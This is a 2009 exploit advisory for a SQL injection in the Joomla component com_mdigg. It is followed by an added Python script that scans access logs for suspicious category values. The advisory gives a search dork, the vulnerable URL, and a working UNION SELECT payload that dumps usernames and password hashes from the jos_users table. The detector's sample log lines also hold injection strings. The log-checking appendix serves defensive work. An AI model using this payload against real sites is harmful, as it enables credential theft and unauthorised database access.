# Title : Joomla Component com_mdigg SQL Injection Vulnerability
# Published : 2009-12-31
# Author : wlhaan hacker
_____________________________________________________
Joomla Component com_mdigg (category) SQL injection vulnerability
#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+] team wlhaan Hacker #
# [+] Dork : "index.php?option=com_mdigg". #
#####################################################
Example:
http://server/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]
Exploit:
-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
and good luck :D
Thanks to : shooq hacker ..
#####################################################
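
Added example, not part of the original advisory: a log check for the request shape shown above, flagging com_mdigg requests whose category parameter is not a plain unsigned integer. The combined access-log format, the assumption that legitimate category ids are unsigned integers, and all function names are assumptions; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?option=com_mdigg&act=story_lists&task=view&category=3 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php?option=com_mdigg&act=story_lists&task=view&category=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1 HTTP/1.1" 200 830',
    '192.0.2.66 - - [01/Jan/2010:10:00:09 +0000] "GET /index.php?option=com_mdigg&task=view&category=1%2527 HTTP/1.1" 500 0',
    '192.0.2.11 - - [01/Jan/2010:10:01:00 +0000] "GET /index.php?option=com_content&category=news HTTP/1.1" 200 900',
]

def fully_decode(value, rounds=3):
    """Undo repeated URL-encoding so double-encoded input is seen in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_mdigg_requests(log_lines):
    """Return (line_number, decoded_category) for non-integer category values."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_mdigg" not in [o.lower() for o in params.get("option", [])]:
            continue
        for raw in params.get("category", []):
            value = fully_decode(raw).strip()
            # Assumption: a legitimate category id is an unsigned integer.
            if not re.fullmatch(r"\d+", value):
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_mdigg_requests(SAMPLE_LOG):
        print(f"line {number}: category={value!r}")
```

The same allow-list rule (category must be an unsigned integer) is what the component should enforce server-side before the value reaches a query.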